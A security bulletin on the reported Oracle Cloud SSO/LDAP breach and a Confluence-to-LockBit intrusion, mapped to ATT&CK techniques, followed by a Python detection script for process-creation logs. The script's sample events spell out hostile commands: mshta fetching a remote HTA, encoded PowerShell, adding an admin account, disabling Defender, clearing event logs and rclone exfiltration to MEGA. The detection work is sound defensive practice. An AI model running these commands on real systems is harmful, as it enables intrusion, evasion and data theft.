Security Bulletin: March 2025

Oracle Cloud breached, with 6 million records exfiltrated

On 21 March 2025, CloudSEK's XVigil platform identified a threat actor, "rose87168", selling what they claimed were 6 million records exfiltrated from the SSO and LDAP systems of Oracle Cloud. The data reportedly includes JKS (Java KeyStore) files, encrypted SSO passwords, key files, and Enterprise Manager JPS keys.
The actor, active since January 2025, is offering rewards for help decrypting the stolen SSO and LDAP password material and is demanding payment from the more than 140,000 affected tenants for removal of their data.
What do we know so far?

Threat Actor

rose87168, with no known prior history.

Tactics, Techniques, and Procedures (TTPs):

Initial Access:

  • Suspected use of an undisclosed (zero-day) vulnerability.
  • Vulnerability likely present in the Oracle WebLogic servers that host the login pages for oraclecloud.com.
  • Targeted the login endpoints of the form login.(region-name).oraclecloud.com.

Data Exfiltration:

  • Dumped approximately 6 million records from Oracle Cloud's SSO and LDAP.
  • Data includes JKS (Java KeyStore) files, encrypted SSO passwords, key files, and Enterprise Manager JPS keys.

Post-Compromise Activity:

  • Extortion: Demanding payment from affected tenants (over 140,000) for data removal.
  • Incentivizing decryption: Offering incentives for help decrypting SSO and LDAP passwords.
  • Social Media: Created an X (formerly Twitter) page and followed Oracle-related accounts.

Modus Operandi (MO):

  • Vulnerability Exploitation: Identify and exploit a vulnerability in Oracle WebLogic servers used for Oracle Cloud login pages.
  • Data Extraction: Gain unauthorized access to SSO and LDAP data, extracting sensitive information like passwords, keys, and JKS files.
  • Data Storage and Leverage: Store the exfiltrated data and use it for extortion.
  • Extortion and Demands: Contact affected organizations, demanding payment for the removal of their data from the compromised set.
  • Incentivize Further Compromise: Offer rewards for assistance in cracking encrypted passwords, potentially increasing the impact of the breach.

Confluence Exploit Leads to LockBit Ransomware

Threat Actor:

LockBit ransomware group or affiliate, or possibly the ShadowSyndicate group (assessed from IP address associations with the AnyDesk command-and-control server).

Tactics, Techniques, and Procedures (TTPs):

Initial Access:

  • T1190 Exploit Public-Facing Application: Exploitation of CVE-2023-22527 (Confluence Data Center and Server template-injection RCE) on an internet-exposed Windows Confluence server.

Execution:

  • T1218.005 Signed Binary Proxy Execution: Mshta: Used mshta.exe to download and execute a Metasploit stager.
  • T1059.001 Command and Scripting Interpreter: PowerShell: Used PowerShell for various tasks, including downloading AnyDesk, deobfuscating and executing shellcode, clearing event logs and disabling Windows Defender.

Persistence:

  • T1543.003 Create or Modify System Process: Windows Service: Installed AnyDesk as a service for persistent remote access.
  • T1136.001 Create Account: Local Account: Created a new local account ("backup") and added it to the local Administrators group.

Privilege Escalation:

  • T1068 Exploitation for Privilege Escalation: The Confluence RCE executed in the context of the Confluence service, which ran as SYSTEM, so no further escalation was needed on the web server.
  • Used that SYSTEM access to create a local administrator account for continued privileged access.

Defense Evasion

  • T1562.001 Impair Defenses: Disable or Modify Tools: Turned off Windows Defender via the GUI.
  • T1070.001 Indicator Removal on Host: Clear Windows Event Logs: Cleared Windows event logs on the file server.
  • T1070.004 Indicator Removal: File Deletion: Deleted the tooling they had brought into the environment.

Command And Control

  • T1573.001 Encrypted Channel: Symmetric Cryptography: Metasploit communication was likely encrypted.
  • T1071.001 Application Layer Protocol: Web Protocols: Used HTTP for downloading the Metasploit stager.
  • T1219 Remote Access Software: Used AnyDesk for remote access and control.

Exfiltration

  • T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage: Used Rclone to exfiltrate data to MEGA.io cloud storage.

Modus Operandi (MO)

  • Exploit Confluence vulnerability (CVE-2023-22527).
  • Deploy Metasploit stager and AnyDesk for persistent access.
  • Use Mimikatz and other tools to steal credentials.
  • Deploy LockBit ransomware across the estate with PDQ Deploy for automated distribution, with manual execution on critical servers.
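A detection sweep over process-creation telemetry for the behaviours in this chain, added here as an example and not taken from the bulletin or the underlying incident report. It assumes a minimal JSON Lines schema (host, parent, image, cmdline) standing in for Sysmon Event ID 1 or Security 4688 records; the sample events are constructed (hosts CONF01, FS01 and WS07, the 198.51.100.10 address and the rclone remote name "mega" are made up). It detects the PowerShell route to disabling Defender rather than the GUI toggle described above, which would need Defender's operational log instead.

```python
import json
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample events (JSON Lines) in an assumed schema that stands in for
# Sysmon Event ID 1 / Security 4688 process-creation records. Nothing here is from
# the incident: hosts, paths, the 198.51.100.10 address and the "mega" remote are made up.
SAMPLE_EVENTS = r"""
{"host": "CONF01", "parent": "C:\\Atlassian\\Confluence\\bin\\tomcat9.exe", "image": "C:\\Windows\\System32\\mshta.exe", "cmdline": "mshta http://198.51.100.10/a.hta"}
{"host": "CONF01", "parent": "C:\\Windows\\System32\\mshta.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4A"}
{"host": "CONF01", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net user backup Str0ngPass! /add"}
{"host": "CONF01", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net localgroup administrators backup /add"}
{"host": "CONF01", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Users\\backup\\Downloads\\AnyDesk.exe", "cmdline": "AnyDesk.exe --install \"C:\\Program Files (x86)\\AnyDesk\" --start-with-win --silent"}
{"host": "CONF01", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"}
{"host": "FS01", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Windows\\System32\\wevtutil.exe", "cmdline": "wevtutil cl Security"}
{"host": "FS01", "parent": "C:\\Windows\\System32\\cmd.exe", "image": "C:\\Tools\\rclone.exe", "cmdline": "rclone copy D:\\Finance mega:staging --transfers 8"}
{"host": "WS07", "parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad C:\\Users\\alice\\notes.txt"}
"""


@dataclass(frozen=True)
class Finding:
    technique: str
    host: str
    detail: str


def load_events(jsonl):
    """Parse JSON Lines into event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def _lc(ev, key):
    return str(ev.get(key, "")).lower()


def _base(path):
    return path.rsplit("\\", 1)[-1]


def _confluence_child(ev):
    # Assumption: the Confluence Windows service runs under a tomcat*.exe wrapper
    # or from a path containing "confluence"; adjust to your install layout.
    parent = _lc(ev, "parent")
    return _base(parent).startswith("tomcat") or "confluence" in parent


# (MITRE ID, description, predicate over one event). Matching is case-insensitive.
RULES = [
    ("T1218.005", "mshta.exe spawned by the Confluence/Tomcat service",
     lambda ev: _base(_lc(ev, "image")) == "mshta.exe" and _confluence_child(ev)),
    ("T1059.001", "PowerShell launched with an encoded command (-e/-ec/-enc/-encodedcommand)",
     lambda ev: "powershell" in _base(_lc(ev, "image"))
     and re.search(r"\s-e(?:c|nc|ncodedcommand)?\b", _lc(ev, "cmdline")) is not None),
    ("T1136.001", "net.exe account creation or addition to local Administrators",
     lambda ev: _base(_lc(ev, "image")) in ("net.exe", "net1.exe")
     and "/add" in _lc(ev, "cmdline")
     and (re.search(r"\buser\b", _lc(ev, "cmdline")) is not None
          or ("localgroup" in _lc(ev, "cmdline") and "administrators" in _lc(ev, "cmdline")))),
    ("T1543.003", "AnyDesk silent service install",
     lambda ev: "anydesk" in _base(_lc(ev, "image")) and "--install" in _lc(ev, "cmdline")),
    ("T1562.001", "Defender real-time monitoring disabled from PowerShell",
     lambda ev: "powershell" in _base(_lc(ev, "image"))
     and "set-mppreference" in _lc(ev, "cmdline")
     and "disablerealtimemonitoring" in _lc(ev, "cmdline")),
    ("T1070.001", "event log cleared with wevtutil",
     lambda ev: _base(_lc(ev, "image")) == "wevtutil.exe"
     and re.search(r"\b(?:cl|clear-log)\b", _lc(ev, "cmdline")) is not None),
    ("T1567.002", "rclone transfer to a MEGA remote (remote name 'mega' is an assumption)",
     lambda ev: _base(_lc(ev, "image")) == "rclone.exe"
     and re.search(r"\bmega\b", _lc(ev, "cmdline")) is not None),
]


def run_rules(events):
    """Evaluate every rule against every event; one Finding per (event, rule) hit, in event order."""
    findings = []
    for ev in events:
        for technique, desc, pred in RULES:
            if pred(ev):
                findings.append(Finding(technique, ev.get("host", "?"), f"{desc}: {ev.get('cmdline', '')}"))
    return findings


def techniques_seen(findings):
    """Sorted, de-duplicated list of technique IDs that fired."""
    return sorted({f.technique for f in findings})


def chain_by_host(findings):
    """Per-host sequence of matched techniques, preserving event order."""
    chain = defaultdict(list)
    for f in findings:
        chain[f.host].append(f.technique)
    return dict(chain)


if __name__ == "__main__":
    for f in run_rules(load_events(SAMPLE_EVENTS)):
        print(f"{f.host:7} {f.technique}  {f.detail}")
```

Run as a script to print the findings; `chain_by_host` gives the per-host order of matched techniques, which is the quickest way to see whether the web server and the file server show the same hands-on-keyboard sequence. The parent-process check on the mshta rule is what separates this from a generic LOLBin alert: a web application service spawning mshta.exe is the signature of the Confluence exploitation step.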
